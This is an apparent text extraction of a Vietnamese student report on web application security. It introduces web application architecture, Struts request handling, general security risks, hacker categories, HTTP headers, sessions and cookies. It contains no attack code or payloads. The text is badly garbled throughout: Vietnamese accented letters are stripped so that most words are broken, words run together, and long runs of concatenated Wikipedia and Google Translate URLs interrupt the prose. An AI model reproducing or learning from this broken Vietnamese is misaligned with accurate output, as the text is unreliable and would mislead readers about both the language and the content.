Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744

8/3/2019 Do an Ta n Cong Va Ba o Ma t u Ng Du Ng Web 289 3744

1/55

n :ng dng web v vn bo mt GVHD:Thy Hunh Nguyn Thnh Lun

LI M U

Trong thi i ngy ny nay internet rt tr nn quen thuc v l mt cng chu ch mt t nc gii thiu hnh nh hay n gin ch l mt trang web c nhn

ca mt ai gii thiu v mnh. Tt c ko theo s pht trin khng ngng ca cc

ng dng web. V dn dn khi nim ng dng web tr nn ph bin .Khi m trn

internet ,ng dng web tr ln ph bin ,ng dng mt cch rng ri th cc cuctn cng ng dng web cng pht trin ht sc phc tp. iu ny t ra vn cp

thit cn lm nh th no bo m an ton thng tin cho ng dng web, thng tin

ca ngi s dng. Cc khi nim chuyn mn v ng dng web v tn cng ng dng

web cng dn tr nn ph bin hn trong cc ti liu chuyn ngnh . Cc cng c h

tr ngi lp trnh web, ngi qun tr mng cng xut hin gip tm kim l hng ca

ng dng web nhng n khng theo kp s pht trin nhanh n mc chng mt theo

xu hng nhanh hn p hn ca cc ng dng web, v tt nhin n khng th ngnchn hon ton cc cuc tn cng ng dng web, khi m cc cuc tn cng ngy cng

a dng khai thc trit nhng li ca ng dng web, ca ngi qun tr, hay ngi

lp trnh ng dng web.

Thng k cho thy 75% cuc tn cng internet l tn cng ng dng web,n gy ra

nhng thit hi v cng to ln, v vy vic tm hiu v tn cng ng dng web l rt

cn thit nhm c cch phng chng tn cng v bo mt ng dng web hiu qu tr

thnh mt yu cu cp thit..

Do y l mt xu th tt yu ca thi, nn vic tm hiu v nghin cu v ng dng

web s gip ch rt nhiu cho cc nh lp trnh web mi, hay cc qun tr vin mi cn

t kinh nghim trong vic qun tr h thng mng ca mnh, phng trnh , hay khc

SV :Nguyn Vn i 1


2/55


phc nhng li ca ng dng web. n ny c thc hin nhm mc ch gii

thiu r hn v ng dng web nhm trnh nhng nhm ln v ng thi tm hiu v

nhng tn cng ng dng web ph dng nhm c cch phng chng ,bo mt cho ng

dng web hp l

SV :Nguyn Vn i 2


3/55


Li cm n

Em xin cm n khoa cng ngh thng tin trng cao ng Cng

Thng to iu kin thun li em hon thnh n ny

Cm n Thy Hunh Nguyn Thnh Lun v cc thy trong

khoa cng ngh thng tin tn tnh hng dn cung cp ti liu v

gip em lm n ny.

SV :Nguyn Vn i 3


4/55


Mc Lc

n ca ti nhng phn sauGii thiu v n

Chng 1: Gii thiu tng quan v ng dng web

Chng 2:Gii thiu v nhng thut ng v khi nim lin quan

Chng 3: Gii thiu S lc v mt s cch tn cng ng dng web

c bnChng chng 4: Gii thiu v cch s dng mt s cng c ph

dng

Kt lun v hng pht trin ca n

SV :Nguyn Vn i 4


5/55


CHNG 1: GII THIU TNG QUAN V NG

DNG WEB

1.1 khi nim v ng dng web(website widget hay web

application)

Mang tnh k thut nhiu hn c th gii thch cc ng dng Web truy vn my

ch cha ni dung (ch yu trn c s d liu lu tr ni dung) v to ti liu Web

ng phc v yu cu ca my khch (chnh l ngi dng website). Ti liu cto trong kiu nh dng tiu chun h tr trn tt c mi trnh duyt (nh HTML,

XHTML). JavaScript l mt dng script client-side cho php yu t ng c trn

tng trang (nh thay i nh mi ln ngi dng di chut ti). Trnh duyt Web chnh

l cha kha. N dch v chy tt c script, lnh khi hin th trang web v ni dung

c yu cu

Di gc chc nng, ng dng Web l cc chng trnh my tnh cho php

ngi dng website ng nhp, truy vn vo ra d liu qua mng Internet trn trnh

duyt Web yu thch ca h. D liu s c gi ti ngi dng trong trnh duyt theo

kiu thng tin ng (trong mt nh dng c th, nh vi HTML th dng CSS) t ng

dng Web qua mt Web Server.

SV :Nguyn Vn i 5


6/55


hiu ht c ngha ca khi nim ny chng ta cng i su vo tm hiu

tip m hnh cu trc chc nng v nhim v ca ng dng web.

1.2 Cu trc,chc nng,giao din&nguyn tc hot ng c

bn ca ng dng web

1.2.1 Cu trc c bn ca mt ng dng web

M hnh ca mt ng dng web n gin chnh l m hnh MVC (Model - View -

Controller).

Tng Model: cha cc code connect ti database,truy vn v thm xa sa d liu.

Tng View: cha cc code to giao din tng tc vi ngi dng, d liu c v ra

nhu th no

Tng Controller: cha cc code iu khin dng d liu (flow control), gn kt tng

Mode v tng View li vi nhau.

ng dng c chia thnh cc layer nh th s tng tnh reuse v d dng m rng.

Chng hn nu chng ta mun ng dng c th truy xut trn di dng, chng ta ch cnto mt tng view mi ring cho di ng, tng model v controller khng thay di. Hay

nu chng ta mun thay i database, vic cng d dng hn, ch cn ta to tng

model mi, phn view v controller khng b nh hng.

M hnh th hin quan h ca ba lp trong ng dng web:

SV :Nguyn Vn i 6


7/55


Hnh 1. m hnh 3 tng ca mt ng dng web

Cn y l m hnh ca mt dch v ng dng web:

Hnh2. M hnh dch v ng dng web n gin

Tng Presentation: c dng giao tip vi ngi dng, nhim v chnh l hin thd liu v nhn d liu t ngi dng.

- Tng Business Logic: nhim v chnh l cung cp cc chc nng ca phn mm.

- Tng Data: lu tr d liu, cho php lp Business Logic c th tm kim, trch xut,cp nht d liu.

1.2.2 Giao din ca mt ng dng web

SV :Nguyn Vn i 7


8/55


Giao din web t ra rt t gii hn kh nng ngi dng. Thng qua Java,

JavaScript, DHTML, Flash v nhng cng ngh khc, nhng phng php ch ng

dng mi c nh v trn mn hnh, chi nhc, v dng c bn phm v chut tt c

u c th thc hin c Nhng k thut thng thng nh ko th cng c h trbi nhng cng ngh trn.

Nhng nh pht trin web thng dng ngn ng kch bn pha ngi dng

thm hiu qu cc tnh nng, c bit l to ra mt cm gic giao tip trc quan m

khng cn phi ti trang li (iu m nhiu ngi dng cm thy ngt qung). Va ri,

nhng cng ngh c pht trin phi hp ngn ng kch bn pha ngi dng

vi cng ngh pha my ch nh PHP.Ajax, mt k thut pht trin web s dng kt

hp nhiu cng ngh khc nhau, l mt v d v cng ngh hin ang to ra ngy cng

nhiu tri nghim tng tc hn.

1.2.3Chc nng c bn ca cc ng dng web

ng dng web ph bin nh vo s c mt vo bt c ni u ca mt chng

trnh. Kh nng cp nht v bo tr ng dng Web m khng phi phn phi v ci t

phn mm trn hng ngn my tnh l l do chnh cho s ph bin ca n. ng dngweb c dng hin thc Webmail,bn hng trc tuyn,u gi trc tuyn, wiki,

din n tho lun, Weblog, MMORPG, H qun tr quan h khch hng v nhiu chc

nng khc..

Web cng l knh bn hng thng minh cho hng nghn t chc, doanh nghip,

ln c, nh c. Vi hn mt t ngi dng Internet ngy nay (ngun: Computer

Industry Almanac 2006), thng mi in t M s dng khong 102 t la trong

nm 2006 cho giao dch (ngun: comScore Networks 2007).

Tt c d liu nh vy cn phi c ng gi, lu tr, x l v truyn vn theo

mt cch no , c th s dng ngay hoc vo mt ngy no sau ny. Cc ng

dng Web, trong lnh vc ng k, trnh, truy vn, ng nhp, bn hng v h thng

SV :Nguyn Vn i 8
http://vi.wikipedia.org/w/index.php?title=Java_(Sun)&action=edit&redlink=1http://vi.wikipedia.org/wiki/JavaScripthttp://vi.wikipedia.org/wiki/DHTMLhttp://vi.wikipedia.org/wiki/Adobe_Flashhttp://vi.wikipedia.org/w/index.php?title=K%C3%A9o_th%E1%BA%A3&action=edit&redlink=1http://vi.wikipedia.org/wiki/PHPhttp://vi.wikipedia.org/wiki/Ajaxhttp://vi.wikipedia.org/wiki/Ajaxhttp://vi.wikipedia.org/wiki/Webmailhttp://vi.wikipedia.org/w/index.php?title=B%C3%A1n_h%C3%A0ng_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=%C4%90%E1%BA%A5u_gi%C3%A1_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/wiki/Wikihttp://vi.wikipedia.org/wiki/Di%E1%BB%85n_%C4%91%C3%A0n_Internethttp://vi.wikipedia.org/wiki/Webloghttp://vi.wikipedia.org/wiki/MMORPGhttp://vi.wikipedia.org/w/index.php?title=H%E1%BB%87_qu%E1%BA%A3n_tr%E1%BB%8B_quan_h%E1%BB%87_kh%C3%A1ch_h%C3%A0ng&action=edit&redlink=1http://vi.wikipedia.org/wiki/JavaScripthttp://vi.wikipedia.org/wiki/DHTMLhttp://vi.wikipedia.org/wiki/Adobe_Flashhttp://vi.wikipedia.org/w/index.php?title=K%C3%A9o_th%E1%BA%A3&action=edit&redlink=1http://vi.wikipedia.org/wiki/PHPhttp://vi.wikipedia.org/wiki/Ajaxhttp://vi.wikipedia.org/wiki/Webmailhttp://vi.wikipedia.org/w/index.php?title=B%C3%A1n_h%C3%A0ng_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=%C4%90%E1%BA%A5u_gi%C3%A1_tr%E1%BB%B1c_tuy%E1%BA%BFn&action=edit&redlink=1http://vi.wikipedia.org/wiki/Wikihttp://vi.wikipedia.org/wiki/Di%E1%BB%85n_%C4%91%C3%A0n_Internethttp://vi.wikipedia.org/wiki/Webloghttp://vi.wikipedia.org/wiki/MMORPGhttp://vi.wikipedia.org/w/index.php?title=H%E1%BB%87_qu%E1%BA%A3n_tr%E1%BB%8B_quan_h%E1%BB%87_kh%C3%A1ch_h%C3%A0ng&action=edit&redlink=1http://vi.wikipedia.org/w/index.php?title=Java_(Sun)&action=edit&redlink=1


9/55


qun l ni dung chnh l cc website widget cho php thc hin tt c cng vic mong

mun.

Web chnh l l yu t c bn gip doanh nghip tng cng hnh nh trc

tuyn ca mnh trn th gii mng, to ra v duy tr nhiu mi quan h em li linhun lu di vi khch hng tim nng v khch hng hin ti.

Khng nghi ng g l cc ng dng Web tr thnh th hin hu khp mi ni trn

th gii. Nhng do tnh k thut cao v yu t tng hp phc tp t nhin nn chng

khng c nhiu ngi bit n chnh xc, thm ch b hiu nhm trm trng trong

cuc sng bn rn hng ngy.

Website ngy nay khc xa so vi kiu ha v vn bn tnh ca th k mi

chn hay thi k trc . Cc trang Web hin i cho php ngi dng ly xung ni

dung ng c nhn ha theo thit lp v tham chiu ring. Hn na chng cng c th

chy cc script trn my khch, c th thay i trnh duyt Internet thnh giao din

cho cc ng dng nh th in t, phn mm nh x tng tc (Yahoo Mail, Google

Maps).

Quan trng nht l website hin i cho php ng gi, x l, lu tr v truyn

ti d liu khch hng nhy cm (nh thng tin c nhn, m s th tn dng, thng tinbo mt x hi ) c th dng ngay hoc dng nh k v sau. V, iu ny c thc

hin qua cc ng dng Web. c th l thnh phn webmail (th in t), trang ng

nhp, chng trnh h tr v mu yu cu sn phm hay hot ng mua bn, h thng

qun l ni dung, pht trin website hin i, cung cp cho cc doanh nghip phng

tin cn thit lin lc vi khch hng tng lai v khch hng hin ti.

1.2.4 Nguyn tc hot ng c bn ca mt ng dng webTrong dng tnh ton ch-khch trc y, mi ng dng c chng trnh khch

ring ca n s phc v nh giao din ngi dng v phi c ci t ring r trn

mi my tnh c nhn ca ngi dng. S nng cp phn my ch ca ng dng s cn

SV :Nguyn Vn i 9


10/55


11/55


Bc 1 : Browser to mt HTTP Request gi ti ng dng web

bc 2: Controller chnh ca Struts l class ActionServlet s bt request ny, phn tch

URL ca n, v da vo file struts-config.xml gi request ny ti Action classtng ng

Bc 3: Action class l mt class ca Struts Framework. ng dng ca chng

tathng extends t class ny v vit code s l nhng business tng ng. Chng

hn ta s c mt LoginAction x l vic user login, logout.

Bc 4: Action class c th truy xut, cp nht database nu cn thit.

Bc 5: Khi Action class thc hin vic x l business xong, n s gi yu cu

forward/redirect, cng vi d liu (nu c) v controller.

Bc 6: Controller chuyn control n trang JSP tng ng tng view. Nu trang

JSP ny c s dng d liu, controller s cung cp cho n (y chnh l d liu m

action to ra v ua cho controller

Bc 7: Sau khi trang JSP chun b xong, Controller to mt HTTP Response gi

v cho browser, browser hin th ra mn hnh.

1.2.5 Vn bo mt ng dng web

Khi m ng dng web pht trin rt nhanh v mi mt, kh nng ng dng mt

cch rng ri th vn bo mt cho ng dng web cng c ch trng hn. Mc d

khng th ph nhn nhng ci tin nng cao ng k hin nay, nhng vn v bo

mt trong ng dng Web vn khng ngng tng ln. Nguyn nhn c th xut pht tcc on m khng ph hp. Nhiu im yu nghim trng hay cc l hng cho php

hacker xm nhp thng v truy cp vo c s d liu tch ly d liu nhy cm. Nhiu

c s d liu cha thng tin gi tr (nh chi tit c nhn, thng tin ti chnh) khin

chng tr thnh ch nhm thng xuyn ca hu ht hacker. Mc d hot ng tn

SV :Nguyn Vn i 11


12/55


cng ph hoi website doanh nghip vn din ra thng xuyn, nhng by gi tin tc

thch tng cng kh nng truy cp d liu nhy cm nm trn trnh ch cha database

hn v li nhun khng l t cc v mua bn d liu em li.

Hnh 3 M hnh hot ng ca mt ng dng web

Trong khung hot ng m t trn, bn c th thy tht d dng cho mthacker truy cp nhanh chng thng tin nm trn c s d liu ch vi mt cht sng

to. Nu may mn hn chng c th gp l hng xut pht t s cu th hay li ngi

dng trn cc ng dng Web.

Nh ni, website ph thuc vo c s d liu phn phi thng tin c

yu cu cho ngi dng. Nu ng dng Web khng an ton (nh c l hng, gp phi

mt kiu k thut hacking no ), ton b c s d liu cha thng tin nhy cm s

gp nguy him nghim trng.

Mt s hacker c th chn m c hi vo ng dng Web c l hng la o

ngi dng v dn h ti website phishing. K thut ny c gi l Cross-site

Scripting, c th c dng ngay c khi bn thn Web Server v ni cha c s d liu

khng c l hng no.

SV :Nguyn Vn i 12


13/55


Mt cuc nghin cu gn y ch ra rng 75% cc cuc tn cng mng c

thc hin mc ng dng Web.Website v cc ng dng Web lin quan lun phi sn

sng 24/7 cung cp dch v theo yu cu khch hng, yu cu t pha nhn vin, nh

cung cp v nhiu ngi lin quan khc.ZF Tng la, SSL khng th bo v ng dng Web trc mi hot ng

hacking, n gin v truy cp vo website phi ch public bt k ai cng c

th gh thm website c. Tt c h thng c s d liu hin i (nh Microsoft SQL

Server, Oracle, MySQL) u c th truy cp qua mt s cng c th (nh cng 80,

443). Nu mun, mt ngi no c th kt ni trc tip ti c s d liu mt cch

hiu qu khi vt qua c ch bo mt ca h iu hnh. Cc cng ny m nhm cho

php lin lc vi hot ng giao thng mng hp php, v do cng hnh thnh nnl hng ln nguy him.

Cc ng dng Web thng truy cp d liu cui nh c s d liu khch hng,

iu khin d liu c gi tr v do rt kh c th tuyt i an ton. Lc ny truy

cp d liu thng khng km script cho php ng gi v truyn ti d liu. Nu mt

hacker nhn ra im yu trong mt script, anh ta c th d dng m li lu lng sang

khu vc khc v chia l bt hp php chi tit c nhn ngi dng, d i khi khng h

ch tm lm iu

Hu ht ng dng Web u l t to, do t c c cc kim tra trnh hn

so vi phn mm cng loi. Do cc ng dng ty bin thng d b tn cng hn.

C th ni ng dng Web l mt cng vo (gateway) ca c s d liu, nht l cc ng

dng ty bin. Chng khng c pht trin vi mc bo mt tt nht v khng phi

qua cc kim tra bo mt thng thng. Ni chung, bn cn tr li cu hi: Phn no

trn website chng ta ngh l an ton nhng li m ca cho cc cuc tn cng? v Dliu no chng ta em vo mt ng dng khin n thc hin mt s iu khng nn

lm?. l cng vic ca phn mm r sot l hng Web.

Hin nay , hacker c rt nhiu cch tn cng mt ng dng web t cc k thut

c bn cho n nhng k thut i hi k thut v cng ngh cao cao. Cc cng c(tool)

SV :Nguyn Vn i 13


14/55


h tr ra i ngy cng nhiu , h tr rt nhiu cho ngi qun tr mng , tm ra nhng

l hng c bn v li kp thi nhng ng thi n cng l mt con dao hai li.

Hacker c th dng nhng tool ny pht hin nhng l hng ca mt ng dng web

v t s c cch tn cng tng ng vo l hng ny gy ra rt nhiu tn thtV vy vic nghin cu v cc k thut tn cng v nhng tool c bn hin nay l mt

nhu cu tt yu trong vic nghin cu bo mt ng dng web.

SV :Nguyn Vn i 14


15/55


CHNG 2: GII THIU V CC THUT NG

V KHI NIM LIN QUAN

2.1 Cc khi nim v thut ng thng dng

2.1.1 Cc khi nim chung v ng dng web

Web browser (trnh duyt web) l cc ng dng phn mm cho php ngi

dng truy vn d liu v tng tc vi ni dung nm trn trang Web bn trong website.

Trang Web l tnh; ngi dng gi yu cu mt ti nguyn no , v server s

tr v ti nguyn . Cc trang Web khng c g hn l mt vn bn c nh dng v

phn tn. i vi cc trnh duyt, th cc trang Web tnh khng phi l cc vn kh

khn, v trang Web lc u ch thng tin v cc s kin, a ch, hay lch lm vic

qua Internet m thi, cha c s tng tc qua cc trang Web.

Web "NG" l thut ng c dng ch nhng website c h tr bi

mt phn mm c s web, ni ng hn l mt chng trnh chy c vi giao thc

http. Thc cht, website ng c ngha l mt website tnh c "ghp" vi mt phn

mm web (cc modules ng dng cho Web). Vi chng trnh phn mm ny, ngi

ch website thc s c quyn iu hnh n, chnh sa v cp nht thng tin trnwebsite ca mnh m khng cn phi nh n nhng ngi chuyn nghip.

Tn min (Domain name) l nh danh ca website trn Internet. Tn min

thng gn km vi tn cng ty v thng hiu ca doanh nghip. Tn min l duy

nht v c cp pht cho ch th no ng k trc.

SV :Nguyn Vn i 15


16/55


+Tn min c hai loi

- Tn min quc t dng: www.tencongty.com (.net, .biz .org, .info...)

- Tn min quc gia dng: www.tencongty.com.vn (hoc .net.vn, .biz.vn .org.vn,

.gov.vn...)

-Web hosting l ni khng gian trn my ch c ci dch v Internet nh ftp,www,

ni bn c th cha ni dung trang web hay d liu trn khng gian . L do bn

phi thu Web Hosting cha ni dung trang web, dch v mail, ftp, v nhng my

tnh lun c mt a ch c nh khi kt ni vo Internet ( l a ch IP) , cn

nh nu bn truy cp vo internet nh thng thng hin nay thng qua cc IPS

(Internet Service Provider - Nh cung cp dch v Internet) th a ch IP trn my

bn lun b thay i, do d liu trn my ca bn khng th truy cp c t

nhng my khc trn Internet.

2.1.2 Thut ng ,khi nim v cc cng c lin quan n ng

dng web

CGI: Gii php u tin lm cc trang Web ng l Common Gateway

Interface (CGI). CGI cho php to cc chng trnh chy khi ngi dng gi cc yu

cu. Gi s khi cn hin th cc cc mc bn trn Web site vi mt CGI script ta

c th truy nhp c s d liu sn phm v hin th kt qu. S dng cc form

HTML n gin v cc CGI script, c th to cc ca hng o cho php bn sn

phm cho khch hng qua mt trnh duyt. CGI script c th c vit bng mt s

ngn ng t Perl cho n Visual Basic.

Tuy nhin, CGI khng phi l cch an ton cho cc trang Web ng. Vi

CGI, ngi khc c th chy chng trnh trn h thng. V th c th chy ccchng trnh khng mong mun gy tn hi h thng. Nhng d vy, cho n hm

nay th CGI vn cn c s dng.

Applet:Thng 5/1995, John Gage ca hng Sun v Andressen (nay thuc

Netscape Communications Corporation) cng b mt ngn ng lp trnh mi c tn

SV :Nguyn Vn i 16


17/55


Java. Netscape Navigator h tr ngn ng mi ny, v mt con ng mi cho cc

trang Web ng c m ra, k nguyn ca applet bt u.

Applet cho php cc nh pht trin vit cc ng dng nh nhng vo trang Web.

Khi ngi dng s dng mt trnh duyt h tr Java, h c th chy cc applet trongtrnh duyt trn nn my o Java Virtual Machine (JVM). D rng applet lm c

nhiu iu song n cng c mt s nhc im: thng b chn bi vic c v ghi cc

file h thng, khng th ti cc th vin, hoc i khi khng th thc thi trn pha

client. B li nhng hn ch trn, applet c chy trn mt m hnh bo mt kiu

sandbox bo v ngi dng khi cc on m nguy him. C nhng lc applet c s

dng rt nhiu, nhng n cng c nhng vn ny sinh: l s ph thuc vo my

o Java JVM, cc applet ch thc thi khi c mi trng thch hp c ci t phaclient, hn na tc ca cc applet l tng i chm v th applet khng phi l gii

php ti u cho Web ng.

JavaScript:Cng thi gian ny, Netscape to ra mt ngn ng kch bn gi

l JavaScript. JavaScript c thit k vic pht trin d dng hn cho cc nh thit

k Web v cc lp trnh vin khng thnh tho Java. (Microsoft cng c mt ngn ng

kch bn gi l VBScript). JavaScript ngay lp tc tr thnh mt phng php hiu qu

to ra cc trang Web ng.

Vic ngi ta coi cc trang nh l mt i tng lm ny sinh mt khi nim

mi gi l Document Object Model (DOM). Lc u th JavaScript v DOM c mt s

kt hp cht ch nhng sau chng c phn tch. DOM hon ton l cch biu

din hng i tng ca trang Web v n c th c sa i vi cc ngn ng kch

bn bt k nh JavaScript hay VBScript.

T chc World Wide Web Consortium (W3C) chun ha DOM, trong khiEuropean Computer Manufacturers Association (ECMA) ph duyt JavaScript di

dng c t ECMAScript.

JSP/Servlet, ASP v PHP:Cng vi Java, Sun ng thi a ra mt cng ngh

mi gi l servlet. Cc on m Java s khng chy pha client nh vi applet; chng

SV :Nguyn Vn i 17


18/55


s c chy trn mt ng dng pha server. Servlet cng ng thi phc v cc CGI

script. Servlet l mt bc tin ln, n a ra mt th vin hm API trn Java v mt

th vin hon chnh thao tc trn giao thc HTTP.

JavaServer Page (JSP) l mt cng ngh lp trnh Web ca Sun, cng vi n lmt cng ngh khc ca Microsoft - Active Server Pages (ASP), JSP l cng ngh i

hi mt trnh ch hiu c Java. Microsoft nghin cu cc nhc im ca servlet

v to ra ASP d dng hn thit k cc trang web ng. Microsoft thm cc b cng

c rt mnh v s tch hp rt hon ho vi cc Web server. JSP v ASP c nhng nt

tng ng v chng u c thit k phn tch qua trnh x l khi qu trnh

biu din. C s khc bit v k thut, song c hai u cho php cc nh thit k Web

tp trung vo cch b tr (layout) trong khi cc nh pht trin phn mm th tp trungvo cc k thut lp trnh logic.

Flash:Nm 1996, FutureWave a ra sn phm FutureSplash Animator. Sau

FutureWave thuc s hu ca Macromedia, v cng ty ny a ra sn phm Flash.

Flash cho php cc nh thit k to cc ng dng hot ha v linh ng. Flash khng

i hi cc k nng lp trnh cao cp v rt d hc. Cng ging nh cc nhiu gii php

khc Flash yu cu phn mm pha client. Chng hn nh gi Shockwave Player plug-

in c th c tch hp trong mt s h iu hnh hay trnh duyt.

DHTML:Khi Microsoft v Netscape a ra cc version 4 ca cc trnh duyt

ca h, th cc nh pht trin Web c mt la chn mi: Dynamic HTML (DHTML).

DHTML khng phi l mt chun ca W3C; n ging mt b cng c thng mi hn.

Trong thc t n l mt tp hp gm HTML, Cascading Style Sheets (CSS),

JavaScript, v DOM. Tp hp cc cng ngh trn cho php cc nh php trin sa i

ni dung v cu trc ca mt trang Web mt cch nhanh chng. Tuy nhin, DHTMLyu cu s h tr t cc trnh duyt. Mc d c Internet Explorer v Netscape h tr

DHTML, nhng cc th hin ca chng l khc nhau, cc nh pht trin cn phi bit

c loi trnh duyt no m pha client dng. DHTML tht s l mt bc tin mi,

SV :Nguyn Vn i 18


19/55


nhng n vn cn mt s qui chun pht trin. Hin nay DHTML vn ang trn con

ng pht trin mnh.

XML:K t khi ra i vo gia nm 1990, eXtensible Markup Language

(XML) ca W3C dn xut ca SGML tr nn rt ph bin. XML c mt khp ni,Microsoft Office 12 cng s h tr nh dng file XML.Ngy nay chng ta c rt nhiu

dng dn xut ca XML cho cc ng dng Web (tt nhin l c c XHTML): XUL ca

Mozilla; XAMJ, mt sn phm m ngun m trn nn Java; MXML t Macromedia;

v XAML ca Microsoft.

2.1.3 Cc khi nim v thut ng lin quan n tn cng v bo

mt ng dng web

2.1.3.1 Khi nim hacker

Khi nim hacker c t nhng 50, 60 ca th k trc , v cho n nay tri qua

mt thi gian pht trin kh di hacker chia lm 4 loi:

- Hacker m trng: l nhng chuyn gia lp trnh chuyn tm cc li ca phn mm vi

mc ch sa cha, xy dng h thng an ton hn.

- Hacker m en: i lp vi hacker m trng, l nhng hacker ph hoi v trc li chomnh.

- Hacker m xanh/samurai: l nhng chuyn gia lp trnh ti nng, c cc hng nh

Microsoft mi v lm vic chuyn tm li cho phn mm ca h.

- Hacker m xm hay m nu: l nhng ngi i khi lm cng vic ca hacker m

trng nhng vn lm cng vic ca hacker m en.

-D t nhn mnh l gii no, h vn ang lm cng vic xm nhp h thng thng

qua nhng l hng bo mt. V vy ti s s dng thut ng hacker ch nhng ngi

tn cng ng dng web.

2.1.3.2 HTTP HEARDER

SV :Nguyn Vn i 19


20/55


HTTP HEARDER l trng phn u cha cc thng s hot ng ca mt yu

cu HTTP gia my ch v my khch .Nhng thng tin trnh khch gi trnh ch gi

l HTTP requests(yu cu ),nhng thng tin trnh ch gi cho trnh khch gi l HTTP

responses(tr li )Cc trng tiu xc nh c im khc nhau ca vic chuyn d liu c

yu cu hoc cc d liu c cung cp trong thng ip. HTTP Header c th c

nhiu dng v thng bt u vi tn trng, chm dt vi mt k t i trng, tip

theo l gi tr trng. Tn trng v cc gi tr c th l bt k ng dng c th chui ,

nhng tp li cc lnh vc c chun ha bi Internet Engineering Task. Mt s

tham s c s dng c trong trnh khch m trnh ch.

- (C bng danh sch cc tham s cui n .)

2.1.3.3 SESSION

HTTP l giao thc hng i tng phi trng thi, n khng lu tr trng thi

lm vic gia trnh ch v trnh khch . iu ny gy kh khn cho vic qun l mt s

ng dng web bi v trnh ch khng bit rng trc trnh khch trng thi

no. gii quyt vn ny , ngi ta a ra khi nim SESSION(phin lm vic)

vo giao thc HTTP.SessionID l mt chui chng thc phin lm vic . Mt s trnh ch s cp

pht session cho ngi dng khi h xem trang web trn trnh ch

- duy tr phin lm vic sessionID thng c lu tr vo :

+Bin trn URL

+Bin n from

+Cookie-Phin lm vic ch tn ti trong khong thi gian cho php, thi gian ny c quy

nh ti trnh ch hoc bi ng dng thc thi.Trnh ch t ng gii phng phin lm

vic khi phc ti nghuyn h thng.

SV :Nguyn Vn i 20
http://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/String_(computer_science)&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhjYWtEg-dE3ZfFMowsZyz0YRZaAqwhttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhhcR7ofw-t8ByYbEic_vKAVPBMgSghttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhhcR7ofw-t8ByYbEic_vKAVPBMgSghttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/String_(computer_science)&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhjYWtEg-dE3ZfFMowsZyz0YRZaAqwhttp://translate.googleusercontent.com/translate_c?hl=vi&sl=en&u=http://en.wikipedia.org/wiki/Internet_Engineering_Task_Force&prev=/search%3Fq%3Dhttp%2Bheader%26hl%3Dvi%26biw%3D994%26bih%3D603&rurl=translate.google.com.vn&usg=ALkJrhhcR7ofw-t8ByYbEic_vKAVPBMgSg


21/55


2.1.3.4 COOKIE

L mt phn d liu nh c cu trc c chia s gia trnh ch v trnh duyt

ngi dng.

Cc cookie c lu tr di dng nhng file d liu nh dng text , c ng

dng to ra lu tr truy tm nhn bit nhng ngi dng gh thm trang web v

nhng vng h ngang qua trang. Nhng thng tin nay c th bao gm thng tin

ngi dng, ti khon, mt khucookie c trnh duyt ca ngi dng chp nhn

lu trn a cng ca mnh . Nhiu trnh duyt khng t ng lu tr cookie m cn

ph thuc vo ngi dng c chp nhn lu n hay khng.

Nhng ln truy cp sau vo trang web ng ng dng c th s dng li

nhng thng tin trong cookie(cc thgn tin tai khon lin quan) m ngi dng khng

cn phi ng nhp hay cung cp thm thng tin g c.

C nhiu cch phn loi cookie, phn loi theo i tng thit lp ca

cookie.th cookie chia lm 2 loi: Cookie ca bn th nht l cookie c thit lp bi

tn min trang web c lit k trong thanh a ch. Cookie ca bn th ba n t cc

ngun tn min khc c cc mc, chng hn nh qung co hoc hnh nh, c nhngvo trang. Ngoi ra cn cch chia chia khc chia cookie thnh 4 loi v c secure/non-

secure v perisent/non- perisent nn ta c:

-Persistent v Secure

-Persistent v Non-Secure

- Non-Persistent v Secure

- Non-Persistent v Non-Secure Persistent cookies c lu tr di dng tp tin .txt (v d trnh duyt

NetscapeNavigator s lu cc cookie thnh mt tp tin cookie.txt cn Internet

Explorer s lu thnh nhiu tp tin *.txt trong mi tp tin l mt cookie) trn

my khch trong mtkhon thi gian xc nh.

SV :Nguyn Vn i 21


22/55


Non-persistent cookie th c lu tr trn b nh RAM ca my khch v s b

hy khi ng trang web hay nhn c lnh hy t trang web.

Secure cookies ch c th c gi thng qua HTTPS (SSL).

Non-Secure cookie c th c gi bng c hai giao thc HTTPS hay HTTP.

Thccht l i vi secure cookie th trnh ch s cung cp ch truyn bo

mt.

Cc thnh phnca mt cookie gm:

1. Domain: Tn min ca trang web to cookie ( trong v d trn

2. Flag: mang gi tr TRUE/FALSE - Xc nh cc my khc vi cng tn

min c c truy xut n cookie hay khng.3. Path: Phm vi cc a ch c th truy xutcookie.V d: Nu path l

/tracuu th cc a ch trong th mc /tracuu cng nh tt c cc th

mc con ca n nh /tracuu/baomat c th truy xut n cookie ny. Cn

nu gi tri l / th cookie s c truy xutbitt c a ch

thucmintrang web to cookie.

4. Sercure: mang gi tr TRUE/FALSE - Xc nh y l mt secure cookie

hay khng ngha l kt ni c s dng SSL hay khng.

5. Expiration:thi gian ht hn ca cookie, c tnh bng giy k t

00:00:00 gi GMT ngy 01/01/1970. Nu gi tr ny khng c thit

lp th trnh duyt s hiu y l non-persistent cookie v ch lu trong b

nh RAM v s xo n khi trnh duyt b ng.

6. Name:Tn bin (trong trng hp ny l Apache)

7. Value: Vi cookie c to trn th gi tr ca Apache l64.3.40.151.16018996349247480 v ngy ht hn l 27/07/2006, ca tn

min http://www.redhat.com.

